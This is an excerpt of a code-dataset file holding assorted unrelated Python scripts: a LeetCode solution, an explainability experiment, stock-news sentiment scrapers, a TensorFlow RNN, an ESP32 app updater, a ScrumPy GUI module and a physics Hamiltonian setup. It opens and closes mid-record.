100%\")\r\n\r\n for project in projects:\r\n print(project)\r\n\r\n save(projects, 'projects.cvs')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160309861","text":"class StreamChecker:\n\n def __init__(self, words: List[str]):\n self.words = {}\n self.wordslen = []\n for w in words:\n le = len(w)\n if le not in self.wordslen:\n self.wordslen.append(le)\n self.words[le] = []\n self.words[le].append(w[::-1])\n self.letter = ''\n\n def query(self, letter: str) -> bool:\n self.letter = letter + self.letter\n letter = self.letter\n le = len(letter)\n for wordlen in self.wordslen:\n if wordlen <= le:\n if letter[:wordlen] in self.words[wordlen]:\n return True\n return False\n \n\n# Your StreamChecker object will be instantiated and called as such:\n# obj = StreamChecker(words)\n# param_1 = obj.query(letter)\n","sub_path":"leetcode/wc133/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"537996536","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n#\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport argparse\nimport os\nimport sys\nimport json\nimport time\nfrom collections import defaultdict\n\nimport numpy as np\nimport torch\nimport matplotlib\nmatplotlib.use('agg')\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom openapi.exp.abs_exp import AbsExp\nfrom openapi.utils import set_random_seed, PathManager, Plot\nfrom openapi.log import getLogger\nfrom openapi import config\n\n######################################################################\n# LMT related module must be imported to make the pickle load successfully\nfrom openapi.mdl.lmt import LinearModelTree, Node, LocalLasso\n\n######################################################################\n\nset_random_seed()\n\nlogger = getLogger(__name__)\n\n\ndef flip_pixels(grad, x_tensor, target_model, var_num, clss, f_limit=200):\n origin_prob = target_model.forward(x_tensor)\n origin_prob = origin_prob[0, clss]\n # Feature Index, Feature Gradient, Gradient Sign\n f_rank = sorted([(i, abs(grad[0, i]), grad[0, i] > 0) for i in range(var_num)],\n key=lambda i: i[1], reverse=True)[:f_limit]\n hacked = x_tensor.clone()\n hacked_imgs = []\n for idx, _, sign in f_rank:\n if sign > 0:\n hacked[0, idx] = 0\n else:\n hacked[0, idx] = 1\n hacked_imgs.append(hacked)\n hacked = hacked.clone()\n\n hacked_imgs = torch.cat(hacked_imgs, dim=0)\n predicts = target_model.forward(hacked_imgs)\n print(\"predicts size\", predicts.size())\n cpps = abs(origin_prob - predicts[:, clss])\n nlci = (torch.argmax(predicts, dim=1) != clss)\n return cpps.detach().cpu(), nlci.detach().cpu()\n\n\nclass Exp4(AbsExp):\n def __init__(self, model_name, dataset, expln_name, datasize):\n AbsExp.__init__(self, model_name, dataset, \"4\", expln_name, datasize)\n\n @staticmethod\n def plot(model_name, dataset, datasize):\n exp = \"4\"\n path_manager = PathManager(model_name, dataset)\n cpp = defaultdict(list)\n nlci = defaultdict(list)\n var_num = 0\n for expl_name in AbsExp.get_method_names():\n result_file = path_manager.result_json_path(exp, expl_name, datasize)\n if os.path.isfile(result_file):\n with open(result_file) as f:\n results = json.loads(f.readlines()[0])\n for value in results.values():\n var_num 
= len(value[\"CPP\"])\n                        cpp[expl_name].append(value[\"CPP\"])\n                        nlci[expl_name].append(value[\"NLCI\"])\n\n        pdf_name = path_manager.figure_path(datasize, exp)\n        pp = PdfPages(pdf_name)\n        values = []\n        names = []\n        # Filter condition\n        merger = {\n            AbsExp.GroundTrueh: \"GT,OA,Z/N($10^{-4}$), Z/N($10^{-8}$)\",\n            \"{}:0.0001\".format(AbsExp.LIMELinearRegression): \"L($10^{-4}$), L($10^{-8}$)\"\n        }\n        for name, instances in sorted(cpp.items(), key=Plot.sort_key, reverse=True):\n            value = [0] * (var_num + 1)\n            for instance in instances:\n                for idx, v in enumerate(instance):\n                    value[idx + 1] += v\n            values.append([i / len(instances) for i in value])\n            names.append(name)\n        Plot.plot_line(values, names, pp, model_name, \"CPP\", \"\\#Hacked Features\", [0, 1.01], 0.5)\n\n        values = []\n        names = []\n        for name, instances in sorted(nlci.items(), key=Plot.sort_key, reverse=True):\n            value = [0] * (var_num + 1)\n            for instance in instances:\n                for idx, v in enumerate(instance):\n                    value[idx + 1] += v\n            values.append(value)\n            names.append(name)\n            logger.info(\"Number of instances {}\".format(len(instances)))\n        Plot.plot_line(values, names, pp, model_name, \"NLCI\", \"\\#Hacked Features\", [0, len(instances)], 500)\n        pp.close()\n\n    def run(self):\n        W_EST_NPZ = self.path_manager.w_est_file(self.expln_name, self.data_size)\n        est_grads = np.load(W_EST_NPZ)[\"w\"].item()\n        result = {}\n        for i in range(self.images.size()[0]):\n            start_ts = time.time()\n            x_tensor = self.images[i].view(-1, self.var_num)\n            clss = self.labels[i].item()\n            pred_clss = torch.argmax(self.mdl.forward(x_tensor), dim=1).item()\n            if clss == pred_clss:\n                f_grad = est_grads[i]\n\n                cpps, nlci = flip_pixels(f_grad, x_tensor, self.mdl, self.var_num, clss)\n\n                result[i] = {\n                    \"CPP\": cpps.numpy().tolist(),\n                    \"NLCI\": nlci.numpy().tolist()\n                }\n                print(result[i])\n        rst_str = json.dumps(result)\n        with open(self.result_json, \"w\") as w:\n            w.write(\"{}\\n\".format(rst_str))\n\n        end_ts = time.time()\n        logger.info(\"Time Elapse: {}\".format(end_ts - start_ts))\n        logger.info(\"=\" * 40)\n        logger.info(\"Finish Dataset: {} Datasize: {} Explainer: {} Model: {} Experiment: {}\".format(\n            self.dataset, self.data_size, self.expln_name, self.model_name, self.exp))\n\n\ndef testcases():\n    def test_1():\n        logger.info(\"Using Device: {}\".format(config.DEVICE))\n        model_name = \"MLP\"\n        dataset = \"FMNIST\"\n        expln_name = AbsExp.OpenAPI\n        datasize = 10\n        exp = Exp4(model_name, dataset, expln_name, datasize)\n        exp.run()\n        logger.info(\"Finish\")\n\n    def test_plot():\n        logger.info(\"Using Device: {}\".format(config.DEVICE))\n        model_name = \"MLP\"\n        dataset = \"FMNIST\"\n        expln_name = AbsExp.OpenAPI\n        datasize = 10\n        Exp4.plot(model_name, dataset, datasize)\n        logger.info(\"Finish\")\n\n    # test_1()\n    test_plot()\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--mdl\", help=\"Model Name\", choices=[\"LMT\", \"MLP\"], required=True)\n    parser.add_argument(\"--dataset\", help=\"data. E.g. 
FMNIST\", choices=[\"FMNIST\", \"MNIST\"], required=True)\n parser.add_argument(\"--datasize\", help=\"number of test images per class\", required=True)\n parser.add_argument(\"--explainer\", help=\"name of explainer\", choices=AbsExp.get_method_names())\n parser.add_argument(\"--gpu\", help=\"GPU used\", choices=[\"cuda:1\", \"cuda:0\", \"cuda:2\", \"cuda:3\"])\n parser.add_argument(\"--task\", help=\"GPU used\", choices=[\"plot\", \"compute\"], required=True)\n parsedArgs = parser.parse_args(sys.argv[1:])\n model_name = parsedArgs.mdl\n dataset = parsedArgs.dataset\n expln_name = parsedArgs.explainer\n datasize = int(parsedArgs.datasize)\n task = parsedArgs.task\n config.DEVICE = parsedArgs.gpu\n\n if task == \"compute\":\n exp = Exp4(model_name, dataset, expln_name, datasize)\n exp.run()\n else:\n Exp4.plot(model_name, dataset, datasize)\n logger.info(\"Finish\")\n\n\nif __name__ == '__main__':\n # testcases()\n main()\n\n","sub_path":"openapi/exp/gradient/exp_4.py","file_name":"exp_4.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"572679873","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport pandas as pd\n\ndef get_gainers():\n url = 'https://finance.yahoo.com/gainers/?offset=0&count=100'\n page = requests.get(url=url,headers={'user-agent': 'my-app/0.0.1'})\n soup = BeautifulSoup(page.content, 'html.parser')\n\n rows = soup.findAll('td')\n \n tickers = []\n for row in rows:\n a = row.find('a')\n if a:\n tickers.append(a.text)\n \n return tickers\n\ndef get_sentiment_dict(ticker):\n url = f'https://finviz.com/quote.ashx?t={ticker}' #Must have 3.6 or up\n page = requests.get(url=url,headers={'user-agent': 'my-app/0.0.1'})\n soup = BeautifulSoup(page.content, 'html.parser')\n news_headlines = soup.findAll(\"a\", {'class':'tab-link-news'})\n #List of Headlines\n headlines = []\n for h in news_headlines:\n headlines.append(h.text)\n df = pd.DataFrame(headlines, columns=['Headlines'])\n # Instantiate the sentiment intensity analyzer\n vader = SentimentIntensityAnalyzer()\n # Iterate through the headlines and get the polarity scores using vader\n scores = df['Headlines'].apply(vader.polarity_scores).tolist()\n\n temp = {}\n comp = 0\n neu = 0\n pos = 0\n neg = 0\n for i in range(len(headlines)):\n temp[headlines[i]] = scores[i]\n comp += scores[i]['compound']\n pos += scores[i]['pos']\n neg += scores[i]['neg']\n neu += scores[i]['neu']\n \n averages = {'compound': round(comp/len(scores),3),\n 'pos': round(pos/len(scores),3),\n 'neg': round(neg/len(scores),3),\n 'neu': round(neu/len(scores),3)}\n \n return temp, averages\n \n\ndef get_current_price(ticker):\n \"\"\"\n type ticker: string, uppercase, length < 5\n rtype: float\n \"\"\"\n url = f'https://www.marketwatch.com/investing/stock/{ticker}' #Must have 3.6 or up\n page = requests.get(url=url)\n soup = BeautifulSoup(page.content, 'html.parser')\n price = soup.find('bg-quote', {'field':'Last'})\n if price:\n string = price.text\n index = string.find(',')\n if index > 0:\n string = string[:index] + string[index+1:]\n return float(string)\n return 0\n\ndef get_sentiment(ticker):\n \"\"\"\n Returns float of sentiment for given ticker, calculated by averaging sentiment\n of scraped news headlines\n -1 <= sentiment <= 1\n \"\"\"\n url = f'https://finviz.com/quote.ashx?t={ticker}' #Must have 3.6 or up\n page = requests.get(url=url,headers={'user-agent': 'my-app/0.0.1'})\n 
soup = BeautifulSoup(page.content, 'html.parser')\n    news_headlines = soup.findAll(\"a\", {'class':'tab-link-news'})\n    \n    #List of Headlines\n    headlines = []\n    for h in news_headlines:\n        headlines.append(h.text)\n    \n    df = pd.DataFrame(headlines, columns=['Headlines'])\n\n    # Instantiate the sentiment intensity analyzer\n    vader = SentimentIntensityAnalyzer()\n    # Iterate through the headlines and get the polarity scores using vader\n    scores = df['Headlines'].apply(vader.polarity_scores).tolist()\n    \n    total = 0\n    for i in range(len(scores)):\n        total = total + scores[i]['compound']\n    if len(scores)>0:\n        return round(total/len(scores), 3)\n    else:\n        return 0\n\ndef get_sector_sentiments():\n    \"\"\"\n    Returns a dataframe of sentiments by sector and ticker\n    \"\"\"\n    sectors = {'Consumer Cyclical' : ['AMZN', 'HD','NKE','MCD','SBUX','GM','F', 'LVS'],\n               'Communication Services' : ['GOOGL','FB','VZ','T','EA','DIS','NFLX', 'TMUS', 'CMCSA'],\n               'Consumer Defense' : ['WMT','PG','COST','EL','KMB','CL','TGT','KHC', 'PEP'],\n               'Technology' : ['MSFT','AAPL','INTC','CSCO','CRM','IBM'],\n               'Financial' : ['V','MA','JPM','GS','BLK'],\n               'Healthcare' : ['PFE','ABBV','AGN','JNJ','MRK','CVS','ABT'],\n               'Industrials' : ['GE','UPS','MMM','AMT','NEE','RTX','BA'],\n               'Energy' : ['XOM','CVX','COP','PSX','KMI']}\n    sentiments = {}\n    for sector in sectors:\n        sector_sum = 0\n        num_ticks = 0\n        sector_sentiments = {}\n        for t in sectors[sector]:\n            t_s = get_sentiment(t)\n            sector_sentiments[t] = t_s\n            sector_sum += t_s\n            num_ticks += 1\n        sector_sentiments['Sentiment'] = round(sector_sum/num_ticks, 3)\n        sentiments[sector] = sector_sentiments\n    return sentiments\n\ndef get_SANDP_tickers():\n    \"\"\"\n    Function that will web scrape S and P 500 ticker symbols\n    \"\"\"\n    url='https://en.wikipedia.org/wiki/List_of_S%26P_500_companies'\n    page = requests.get(url)\n    page_content = page.content\n    soup = BeautifulSoup(page_content,'html.parser')\n    tickers = soup.findAll('a', {'class':'external text'})\n    \n    tickers_text = ['SPY']\n    for ticker in tickers:\n        text = ticker.text\n        if len(text) < 5:\n            tickers_text.append(text)\n    \n    return tickers_text\n\ndef get_low_float_stocks():\n    urls = [\"https://www.highshortinterest.com/\", \"https://www.highshortinterest.com/all/2\"]\n    stocks = []\n    for url in urls:\n        page = requests.get(url)\n        page_content = page.content\n        soup = BeautifulSoup(page_content,'html.parser')\n\n        rows = soup.findAll(\"tr\")\n        for i in range(6,len(rows)):\n            tds = rows[i].findAll(\"td\")\n            if len(tds) > 4:\n                ticker = tds[0].find('a').text\n                flt = tds[4].text\n                flt = float(flt[:-1])\n                if flt < 100.0: #in millions\n                    stocks.append(ticker)\n    return stocks","sub_path":"modules/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":5627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254284935","text":"#This program will calculate the average of a series of numbers\n#You'll be asked to enter a series of numbers of your choice\n#This program will be adding a rogue value of -1\n\n\nadded = -1\namount = int(input(\"please enter amount of numbers wanted\"))\nvalue = sum(float(input(\"please enter your number:\"))for count in range(amount))\nmean = (value + added) / amount \nprint(mean) \n\n\n","sub_path":"Iteration_Revision_Exercises_Task5.py","file_name":"Iteration_Revision_Exercises_Task5.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"90991757","text":"#coding=utf-8\n\nimport os,requests\n\ndef downloadRes(serverUrl,filename):\n cur_file_path = os.path.abspath('.')\n #print cur_file_path\n save_file_name = os.path.join(cur_file_path,filename)\n #判断文件路径是否存在\n dirname = os.path.dirname(save_file_name)\n dirname=dirname.replace('/','\\\\')\n if os.path.exists(dirname):\n pass\n else:\n os.makedirs(dirname)\n url = serverUrl + filename;\n try:\n # Solution 1\n # f = urllib2.urlopen(url)\n # data = f.read()\n # with open(filename,'wb') as code:\n # code.write(data)\n # code.close()\n\n # Solution 2\n print('Begin downloading ' + filename)\n r = requests.get(url)\n with open(filename,'wb') as code:\n code.write(r.content)\n code.close()\n print('Done!')\n except Exception as e:\n print(e)\n print(url)\n \nif __name__ == '__main__':\n fileobj = open('res.txt')\n all_lines = fileobj.readlines()\n for line in all_lines:\n line =line.strip()\n serverurl = \"http://softgames.cn/games/bubble-shooter/\"\n downloadRes(serverurl,line)\n fileobj.close()","sub_path":"platforms/android/assets/www/dw.py","file_name":"dw.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"425050951","text":"import ugfx, woezel, easywifi, easydraw, appglue, time, os\n\ndef stop():\n time.sleep(2)\n appglue.start_app(\"launcher\")\n\neasydraw.msg(\"Welcome!\",\"Still updating anyway...\",True)\n\n\nif not easywifi.status():\n if not easywifi.enable():\n stop()\n\ntry:\n apps = os.listdir('lib')\nexcept OSError:\n easydraw.msg(\"There are no apps installed.\")\n stop()\n\nfor app in apps:\n easydraw.msg(\"Updating '\"+app+\"'...\")\n try:\n woezel.install(app)\n easydraw.msg(\"Done!\")\n except:\n print(\"failed update. Already newest version?\")\n\neasydraw.msg(\"All your apps are now up-to-date!\")\nstop()\n","sub_path":"esp32/modules_sha2017/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546472118","text":"\"\"\"\n\n\nScrumPy -- Metabolic Modelling with Python\n\nCopyright Mark Poolman 1995 - 2002\n\n This file is part of ScrumPy.\n\n ScrumPy is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n ScrumPy is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with ScrumPy; if not, write to the Free Software\n Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n\"\"\"\nimport Tkinter\n\n#from ScrumPy.ThirdParty.Pmw\nimport Pmw\n\nimport TextSelect\nimport FileDialogs\n\ndef ignore(*args, **kwargs):\n pass\n\nclass Saver(Tkinter.Toplevel):\n def __init__(self, Model, **kwargs):\n\n self.model = Model\n try:\n self.name = Model.ModelName\n except:\n self.name = \"un-named data\"\n self.TheData = {} # make a dict here in case user tries to update before self.OK()\n Tkinter.Toplevel.__init__(self)\n self.group = Pmw.Group(self)\n\n self.typesel = Pmw.RadioSelect(\n self.group.interior(),\n command=self.RadioClick,\n #label_text = 'Update policy',\n buttontype=\"radiobutton\",\n orient=\"vertical\"\n )\n self.typesel.add(\"Static\")\n self.typesel.add(\"Dynamic\")\n\n self.datsel = TextSelect.TextSelector(self.group.interior(), self.model.keys(), ignore)\n self.datsel._listbox[\"selectmode\"] = \"extended\"\n\n self.ok = Tkinter.Button(self, text=\"OK\", command=self.OK)\n self.group.pack(expand=1, fill=\"both\")\n\n self.typesel.pack(side = \"left\", expand=1, fill=\"both\")\n self.datsel.pack(side = \"right\", expand=1, fill=\"both\")\n self.ok.pack(side=\"bottom\", fill=\"both\")\n\n\n def RadioClick(self,arg):\n\n if arg == \"Static\":\n self.MakeStatic()\n else:\n self.MakeDynamic()\n\n def MakeStatic(self):\n self.model.Unregister(self)\n self.model.AddStatMonitor(self)\n\n def MakeDynamic(self):\n self.model.Unregister(self)\n self.model.AddDynMonitor(self)\n\n def OK(self):\n self.datanames = self.datsel.Selected() # what the user has selected\n self.TheData = self.model.NewDataSet(self.datanames) # where the data will be stored\n self.fname = FileDialogs.SaveFileName() # file name to which data will finally go\n self.typesel.destroy() # user has selected, can't change mind\n self.ok.destroy() # you can only say \"OK\" once\n self.datsel.setlist(self.datanames) # so that the user can see what they selected\n self.Running = Tkinter.Label(self, text=\"Saver for \" + self.name + \"\\n(will update automatically)\" )\n self.Running.pack() # leave a window open to remind them they have an active saver\n\n\n def destroy(self):\n self.model.Unregister(self)\n self.SaveOrLose()\n\n def SaveOrLose(self):\n try:\n self.Running.destroy()\n msg = Tkinter.Label(\n self,\n text=\"Saver for \" + self.name +\n \"\\nModel has changed or window closed:\\n save or lose current data?\")\n msg.pack()\n Tkinter.Button(self, text=\"Save\", command=self.finalSave).pack()\n Tkinter.Button(self, text=\"Lose\", command=self.tkdestroy).pack()\n except:\n self.tkdestroy() # if the user destroys before hitting \"OK\"\n\n def Save(self):\n self.TheData.WriteFile(self.fname)\n\n\n def tkdestroy(self):\n Tkinter.Toplevel.destroy(self)\n\n\n\n def finalSave(self):\n self.Save()\n self.tkdestroy()\n\n\n def Update(self):\n self.TheData.Update()\n #self.model.UpdateDataSet(self.TheData)\n\n\n","sub_path":"models/poolman/ScrumPy549/ScrumPy/tkGUI/Saver.py","file_name":"Saver.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"541039122","text":"import tensorflow as tf\nfrom tensorflow.contrib import rnn\nimport numpy as np\n\nCLASS_1 = 1 # next is space\nCLASS_0 = 0 # next is not space\nclass_size = 2\n\n# \"hi, hello\"\n# {' 
': 0, ',': 1, 'e': 2, 'h': 3, 'i': 4, 'l': 5, 'o': 6}\n# ,:[0,1,0,0,0,0,0] e:[0,0,1,0,0,0,0], h:[0,0,0,1,0,0,0], i:[0,0,0,0,1,0,0], l:[0,0,0,0,0,1,0], o:[0,0,0,0,0,0,1]\nx_data = [\n [ [0, 0, 0, 1, 0, 0, 0], # h\n [0, 0, 0, 0, 1, 0, 0], # i\n [0, 1, 0, 0, 0, 0, 0], # ,\n [0, 0, 0, 1, 0, 0, 0], # h\n [0, 0, 1, 0, 0, 0, 0], # e\n [0, 0, 0, 0, 0, 1, 0], # l\n [0, 0, 0, 0, 0, 1, 0], # l\n [0, 0, 0, 0, 0, 0, 1] ] # o\n ]\ny_data = [[0, 0, 1, 0, 0, 0, 0, 1]]\n\nbatch_x = np.array(x_data, dtype='f')\nbatch_y = np.array(y_data, dtype='int32')\n\n\n# Parameters\nlearning_rate = 0.001\ntraining_iters = 500\ndisplay_step = 100\n\n# Network Parameters\nbatch_size = 1\nsequence_size = 8 # timesteps\nvector_size = 7 # vocaburary size\nhidden_size1 = 256 # hidden layer num of features\nhidden_size2 = 64 # hidden layer num of features\nhidden_size3 = 16 # hidden layer num of features\ndrop_out_rate = 0.7\n\n# tf Graph input\nx = tf.placeholder(\"float\", [None, sequence_size, vector_size])\ny = tf.placeholder(\"int32\", [None, sequence_size])\n\nweights = {\n 'out1': tf.get_variable(\"out1\", shape=[2 * hidden_size1, hidden_size2], initializer=tf.contrib.layers.xavier_initializer()),\n 'out2': tf.get_variable(\"out2\", shape=[hidden_size2, hidden_size3], initializer=tf.contrib.layers.xavier_initializer()),\n 'out3': tf.get_variable(\"out3\", shape=[hidden_size3, class_size], initializer=tf.contrib.layers.xavier_initializer())\n}\nbiases = {\n 'out1': tf.Variable(tf.constant(0.1, shape=[hidden_size2]), name=\"bias_out1\"),\n 'out2': tf.Variable(tf.constant(0.1, shape=[hidden_size3]), name=\"bias_out2\"),\n 'out3': tf.Variable(tf.constant(0.1, shape=[class_size]), name=\"bias_out3\")\n}\n\ndef BidirectionalRNN(X, weights, biases):\n X = tf.unstack(X, sequence_size, axis=1)\n\n fw_cell = rnn.GRUCell(hidden_size1)\n bw_cell = rnn.GRUCell(hidden_size1)\n\n outputs, state_fw, state_bw = rnn.static_bidirectional_rnn(fw_cell, bw_cell, X, dtype=tf.float32)\n\n final_outputs = []\n for output in outputs:\n hidden1 = tf.nn.relu( tf.matmul( output, weights['out1']) + biases['out1'] )\n hidden1_1 = tf.nn.dropout(hidden1, drop_out_rate)\n hidden2 = tf.nn.relu( tf.matmul( hidden1_1, weights['out2']) + biases['out2'] )\n hidden2_1 = tf.nn.dropout(hidden2, drop_out_rate)\n out = tf.nn.relu( tf.matmul(hidden2_1, weights['out3']) + biases['out3'] )\n final_outputs.append(out)\n return final_outputs\n\ny_ = BidirectionalRNN(x, weights, biases)\nlogits = tf.reshape(tf.concat(y_, 1), [-1, class_size], name=\"logits\")\ntargets = tf.reshape(y, [1, -1], name=\"targets\")\n\nseq_weights = tf.ones([batch_size * sequence_size])\nloss = tf.contrib.legacy_seq2seq.sequence_loss_by_example([logits], [targets], [seq_weights])\n\ncost = tf.reduce_sum(loss) / batch_size\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, name=\"optimizer\").minimize(cost)\n\n\n\nNUM_THREADS = 1\nsess = tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS,inter_op_parallelism_threads=NUM_THREADS,log_device_placement=False))\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nstep = 0\nwhile step < training_iters :\n feed={x: batch_x, y: batch_y}\n sess.run(optimizer, feed_dict=feed)\n\n if step % display_step == 0 :\n p_x, p_y, p_y_, p_logits, p_cost = sess.run([x, y, y_, logits, cost], feed_dict=feed)\n print ('step : %s' % step + ',' + 'cost : %s' % p_cost)\n\n step += 1\n\n\n# inference\ntest_sentences = ['hi,hello']\n\ni = 0\nwhile i < len(test_sentences) :\n sentence = test_sentences[i]\n length = 
len(sentence)\n diff = sequence_size - length\n if diff > 0 : # add padding\n test_sentences[i] += ' '*diff\n i += 1\n\nbatch_size = len(test_sentences)\n\nfeed={x: batch_x, y: batch_y}\ny_, logits, result = sess.run([y_, logits, tf.arg_max(logits, 1)], feed_dict=feed)\n\ni = 0\nwhile i < len(test_sentences) :\n sentence = test_sentences[i]\n bidx = i * sequence_size\n eidx = bidx + sequence_size\n rst = result[bidx:eidx]\n\n out = []\n j = 0\n while j < sequence_size :\n tag = rst[j]\n if tag == CLASS_1 :\n out.append(sentence[j])\n out.append(' ')\n else :\n out.append(sentence[j])\n j += 1\n n_sentence = ''.join(out).strip()\n print ('out = ' + n_sentence)\n i += 1\nsess.close()","sub_path":"a_BasicModels/bidirectional_rnn.py","file_name":"bidirectional_rnn.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349313500","text":"#!/usr/bin/env python\n#coding: UTF-8\nimport csv\n\n# = open('pzd.txt', 'r')\n#dataReader = csv.reader(f)\n\n#for line in dataReader:\n#\tprint line\n#for line in open('pzd.txt', 'r'):\n#\telement = line.split(\",\")\n#\tprint element[3]\n#f.close()\n\n# read the input file\nf=open('pwz.txt')\nline=f.readline()\n\n# write the results out to a csv file\nnew = open('pwz.csv', 'ab')\ncsvWriter = csv.writer(new)\n\n\nwhile line:\n\telement = line.split(',')\n\treturnDur = [0]*24 # commuting time\n\tminReturnTime = [0]*19 # time of returning home\n\tatOfficeDur = [0]*12 # time spent at the office\n\ti = 0\n\ta = 0\n\tb = 0\n\tc = 0\n\tlistData = []\n\t#print line\n\twhile i < 54:\n\t\tif i < 23:\n\t\t\treturnDur[a] = element[i]\n\t\t\ta += 1\n\t\telif i >= 23 and i <= 41:\n\t\t\tminReturnTime[b] = element[i]\n\t\t\tb += 1\n\t\telse:\n\t\t\tatOfficeDur[c] = element[i]\n\t\t\tc += 1\n\t\ti += 1\n\tlistData.append(returnDur.index(max(returnDur)) + 1)\n\tlistData.append(minReturnTime.index(max(minReturnTime)) + 1)\n\tlistData.append(atOfficeDur.index(max(atOfficeDur)) + 1)\n\tlistData.append(int(element[54]))\n\tcsvWriter.writerow(listData) # write one row\n\n\tline = f.readline()\nf.close()\n","sub_path":"human/bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"500730199","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division\nimport math\nimport numpy as np\nimport scipy as sp\nimport pandas\nimport matplotlib.pyplot as plt\nfrom progressbar import ProgressBar\nfrom scipy.sparse import linalg as sparse_linalg\nfrom copy import deepcopy\n\nfrom Hamiltonian_Classes import Hamiltonian,H_table,clock_Hamiltonian,spin_Hamiltonian,H_operations\nfrom System_Classes import unlocking_System,U1_system\nfrom Symmetry_Classes import translational,parity,model_sym_data,charge_conjugation,translational_general,PT\n# from Plotting_Classes import eig_overlap,fidelity,entropy,energy_basis\nfrom Construction_functions import bin_to_int_base_m,int_to_bin_base_m,cycle_bits_state\nfrom Search_functions import find_index_bisection\nfrom State_Classes import zm_state,sym_state,prod_state,bin_state,ref_state\nfrom rw_functions import save_obj,load_obj\nfrom Calculations import level_stats,fidelity,eig_overlap,entropy,site_precession,site_projection,time_evolve_state,get_top_band_indices\n\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Computer Modern'],'size':26})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n# 
matplotlib.rcParams['figure.dpi'] = 400\ndef com(a,b):\n return np.dot(a,b)-np.dot(b,a)\ndef exp(Q,psi):\n return np.vdot(psi,np.dot(Q,psi))\ndef var(Q,psi):\n Q2 = np.dot(Q,Q)\n return exp(Q2,psi)-exp(Q,psi)**2\n\n#init system\nN=20\npxp = unlocking_System([0],\"periodic\",2,N)\npxp.gen_basis()\npxp_syms = model_sym_data(pxp,[translational_general(pxp,order=2),PT(pxp)])\n\nHp = dict()\nHp[0] = Hamiltonian(pxp,pxp_syms)\nHp[0].site_ops[1] = np.array([[0,0],[1,0]])\nHp[0].site_ops[2] = np.array([[0,1],[0,0]])\nHp[0].model = np.array([[0,1,0],[0,2,0]])\nHp[0].model_coef = np.array([1,1])\nHp[0].uc_size = np.array([2,2])\nHp[0].uc_pos = np.array([1,0])\n\nHp[1] = Hamiltonian(pxp,pxp_syms)\nHp[1].site_ops[1] = np.array([[0,0],[1,0]])\nHp[1].site_ops[2] = np.array([[0,1],[0,0]])\nHp[1].model = np.array([[0,0,1,0],[0,1,0,0],[0,0,2,0],[0,2,0,0]])\nHp[1].model_coef = np.array([1,1,1,1])\nHp[1].uc_size = np.array([2,2,2,2])\nHp[1].uc_pos = np.array([0,1,1,0])\n\n#2nd order perts\nHp[2] = Hamiltonian(pxp,pxp_syms)\nHp[2].site_ops[1] = np.array([[0,0],[1,0]])\nHp[2].site_ops[2] = np.array([[0,1],[0,0]])\nHp[2].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[2].model = np.array([[0,3,0,1,0],[0,1,0,3,0],[0,3,0,2,0],[0,2,0,3,0]])\nHp[2].model_coef = np.array([1,1,1,1])\nHp[2].uc_size = np.array([2,2,2,2])\nHp[2].uc_pos = np.array([1,1,0,0])\n\nHp[3] = Hamiltonian(pxp,pxp_syms)\nHp[3].site_ops[1] = np.array([[0,0],[1,0]])\nHp[3].site_ops[2] = np.array([[0,1],[0,0]])\nHp[3].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[3].model = np.array([[0,1,0,0,0],[0,0,0,1,0],[0,2,0,0,0],[0,0,0,2,0]])\nHp[3].model_coef = np.array([1,1,1,1])\nHp[3].uc_size = np.array([2,2,2,2])\nHp[3].uc_pos = np.array([1,1,0,0])\n\nHp[4] = Hamiltonian(pxp,pxp_syms)\nHp[4].site_ops[1] = np.array([[0,0],[1,0]])\nHp[4].site_ops[2] = np.array([[0,1],[0,0]])\nHp[4].site_ops[3] = np.array([[-1/2,0],[0,1/2]])\nHp[4].model = np.array([[0,0,1,0,0],[0,0,2,0,0]])\nHp[4].model_coef = np.array([1,1])\nHp[4].uc_size = 